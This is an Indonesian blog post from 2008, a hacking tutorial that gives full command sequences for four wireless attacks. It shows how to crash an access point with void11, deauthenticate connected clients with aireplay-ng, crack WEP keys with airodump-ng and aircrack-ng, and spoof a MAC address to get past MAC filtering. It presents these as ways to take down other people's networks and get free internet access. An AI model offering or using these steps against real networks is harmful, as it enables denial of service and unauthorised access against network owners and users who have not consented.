Sabtu, 07 Juni 2008

Hecker Wi Fi Buhan barabai kota Apam coyyy

1.Menghajar ACCES POINT yang aktif :

Yang dibutuhkan adalah software void11(download di http://www.wlsec.net/void11) dan Kismet( kalau mau lebih mudah pakai Distro Linux Auditor), lalu hardware yang dibutuhkan Laptop dengan PCMCIA Wifi chipset Prism,

Setelah perangkat yang dibutuhkan siap, jalankan Kismet terlebih dahulu untuk melakukan scanning jaringan wifi, setelah anda mendapat info MAC address dari AP target melalui Kismet, ketikkan pada console:

# switch-to-hostap

# iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master

# void11_penetration wlan0 -D -t 1 -B 00:0E:2E:C2:2C:0E

keterangan : -D = debug

-t 1 = type serangan ke AP

-B = MAC Address AP target

-> Ingat pada waktu menjalankan instruksi serangan, Kismet masih aktif berjalan, jangan menutupnya, lalu tunggu beberapa saat, dan berikutnya.................. rontoklah AP target.


2. Melumpuhkan Client yang terhubung pada suatu AP

1.Jalankan Live CD LinuxBackTrack 2.

2.Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.

3.Tutup Kismet, lalu buka console, ketikkan:

#airmon-ng stop ath0 -> untuk mematikan driver ath0

#airmon-ng stop ath1 -> untuk mematikan driver ath1

#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

4.Jalankan scanning wireless menggunakan Airodump :

#airodump-ng ath0

5.Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:

#ifconfig ath0 up -> untuk mengaktifkan ath0

#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).

6.Langkah terakhir, kita lakukan serangan, ketikkan:

#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

Aireplay-ng -> program yang digunakan untuk melakukan de authentication

--deauth -> option untuk serangan de authentication

20 -> jumlah sending packet

00:0E:2E:C1:1E:83 -> MAC-Address komputer target

-a -> option untuk Access Point

00:0E:2E:C2:2C:0E -> MAC-Address Access Point

ath0 -> interface yang digunakan untuk menyerang


3.Menembus Pertahanan WEP Keys

1.Jalankan BackTrack.

2.Reset driver wireless. Ketikkan:

#airmon-ng -> cek interface ath yang aktif

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila ath1 aktif

#airmon-ng start wifi0

3.Buka 3 buah console.

4.Console 1, ketikkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.

#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:

Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE

P Key.

--bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

5.Console 2, ketikkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

6.Console 3, ketikkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

7.Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.


4. Membobol MAC Address Filtering:

1.Jalankan Live CD Distro Linux BackTrack2, masukkan username “root”, lalu masukkan password “toor”.

2.Setelah muncul prompt, ketikkan “startx”.

3.Setelah muncul desktop environment KDE, klik tombol “K” (di pojok kiri bawah). Pilih BackTrack  Radio Network Analysis -> 80211  Analyser  Kismet.

4.Lalu muncul window “Select Network Device”, pilih “wifi0”. Klik “OK”.

5.Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan, maka akan muncul pesan “ALERT: Suspicious client 00:02:6F:37:08:20 - probing networks but never participating.”

6.Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan “Found IP 192.168.2.1 for slamet::00:0E:2E:C2:2C:0E via ARP”.

Keterangan:

slamet -> nama SSID

7.Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni airodump.

Keterangan:

Bila kita menggunakan program scanning yang lain, biasanya program pertama akan membuat driver wireless kita “rusak”. Untuk dapat digunakan pada program yang kedua, kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).

8.Cara memperbaiki driver, ketik:

#airmon-ng -> untuk mengecek interface yang tersedia.

Matikan driver “ath0” dan “ath1” dengan mengetik:

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila interface ath1 ada.

9.Mengaktifkan driver yang baru, ketik:

#airmon-ng start wifi0

10.Bila diketikkan perintah #iwconfig , maka muncul informasi “ath0” sudah aktif dengan Mode=Monitor.

11.Berikutnya, ketik #airodump-ng ath0

12.Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet.

13.Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.

14.Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan ubah MAC-Addressnya.

15. Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh........